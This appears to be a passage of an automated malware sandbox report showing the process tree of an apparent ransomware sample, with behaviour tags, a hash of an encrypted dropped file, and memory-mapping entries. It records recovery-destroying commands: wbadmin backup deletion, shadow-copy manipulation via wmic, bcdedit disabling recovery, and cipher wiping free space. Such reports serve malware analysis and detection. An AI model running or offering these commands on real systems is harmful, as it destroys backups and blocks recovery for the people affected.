C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest5⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cipher.execipher /w:\\?\C:3⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe\\?\C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe -network2⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 676 -s 76962⤵
- Program crash
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 676 -ip 6761⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3844 -s 22802⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 3844 -ip 38441⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.cipher6Filesize
624KB
MD5f4c4ed0c4fb6cbf141c1c368aae13447
SHA12f049e453a19c97698087328c6698e63b89cce1d
SHA25600d56da42bc7cd1717141cc529a8eb12d83d32dfbdffcb91ef4e65d721f8270c
SHA5128994cfe9a0175c5fdfd1f3229de5d3c11534a1271edcfb31df4114cbd20ba81a69c873221bd637aa65054f79a436698d63c49481e7c27be14d1d5ad2f35c1513
-
memory/380-152-0x0000000000000000-mapping.dmp
-
memory/624-136-0x0000000000000000-mapping.dmp
-
memory/704-169-0x0000000000000000-mapping.dmp
-
memory/772-177-0x0000000000000000-mapping.dmp
-
memory/868-171-0x0000000000000000-mapping.dmp
-
memory/892-164-0x0000000000000000-mapping.dmp
-
memory/932-191-0x0000000000000000-mapping.dmp
-
memory/1140-192-0x0000000000000000-mapping.dmp
-
memory/1156-193-0x0000000000000000-mapping.dmp
-
memory/1424-172-0x0000000000000000-mapping.dmp
-
memory/1432-175-0x0000000000000000-mapping.dmp
-
memory/1496-162-0x0000000000000000-mapping.dmp
-
memory/1504-146-0x0000000000000000-mapping.dmp
-
memory/1548-140-0x0000000000000000-mapping.dmp
-
memory/1560-145-0x0000000000000000-mapping.dmp
-
memory/1568-173-0x0000000000000000-mapping.dmp
-
memory/1640-194-0x0000000000000000-mapping.dmp
-
memory/1760-163-0x0000000000000000-mapping.dmp
-
memory/1792-143-0x0000000000000000-mapping.dmp
-
memory/1908-156-0x0000000000000000-mapping.dmp
-
memory/1936-147-0x0000000000000000-mapping.dmp
-
memory/1980-144-0x0000000000000000-mapping.dmp
-
memory/2104-184-0x0000000000000000-mapping.dmp
-
memory/2116-139-0x0000000000000000-mapping.dmp
-
memory/2120-142-0x0000000000000000-mapping.dmp
-
memory/2660-166-0x0000000000000000-mapping.dmp
-
memory/2832-190-0x0000000000000000-mapping.dmp
-
memory/2948-176-0x0000000000000000-mapping.dmp
-
memory/3016-150-0x0000000000000000-mapping.dmp
-
memory/3108-165-0x0000000000000000-mapping.dmp
-
memory/3208-195-0x0000000000000000-mapping.dmp
-
memory/3216-181-0x0000000000000000-mapping.dmp
-
memory/3236-133-0x0000000000000000-mapping.dmp
-
memory/3280-154-0x0000000000000000-mapping.dmp
-
memory/3316-161-0x0000000000000000-mapping.dmp
-
memory/3488-170-0x0000000000000000-mapping.dmp
-
memory/3500-168-0x0000000000000000-mapping.dmp
-
memory/3572-183-0x0000000000000000-mapping.dmp
-
memory/3592-187-0x0000000000000000-mapping.dmp
-
memory/3656-138-0x0000000000000000-mapping.dmp
-
memory/3724-157-0x0000000000000000-mapping.dmp
-
memory/3772-160-0x0000000000000000-mapping.dmp
-
memory/3776-185-0x0000000000000000-mapping.dmp
-
memory/3784-149-0x0000000000000000-mapping.dmp
-
memory/3924-134-0x0000000000000000-mapping.dmp
-
memory/3932-178-0x0000000000000000-mapping.dmp
-
memory/3968-180-0x0000000000000000-mapping.dmp
-
memory/4148-141-0x0000000000000000-mapping.dmp
-
memory/4224-167-0x0000000000000000-mapping.dmp
-
memory/4236-174-0x0000000000000000-mapping.dmp
-
memory/4260-158-0x0000000000000000-mapping.dmp
-
memory/4288-159-0x0000000000000000-mapping.dmp
-
memory/4432-151-0x0000000000000000-mapping.dmp
-
memory/4464-179-0x0000000000000000-mapping.dmp
-
memory/4488-148-0x0000000000000000-mapping.dmp
-
memory/4524-155-0x0000000000000000-mapping.dmp
-
memory/4708-188-0x0000000000000000-mapping.dmp
-
memory/4736-137-0x0000000000000000-mapping.dmp
-
memory/4756-153-0x0000000000000000-mapping.dmp
-
memory/4760-135-0x0000000000000000-mapping.dmp
-
memory/4836-189-0x0000000000000000-mapping.dmp
-
memory/4856-182-0x0000000000000000-mapping.dmp
-
memory/5064-186-0x0000000000000000-mapping.dmp
-
memory/5068-132-0x0000000000000000-mapping.dmp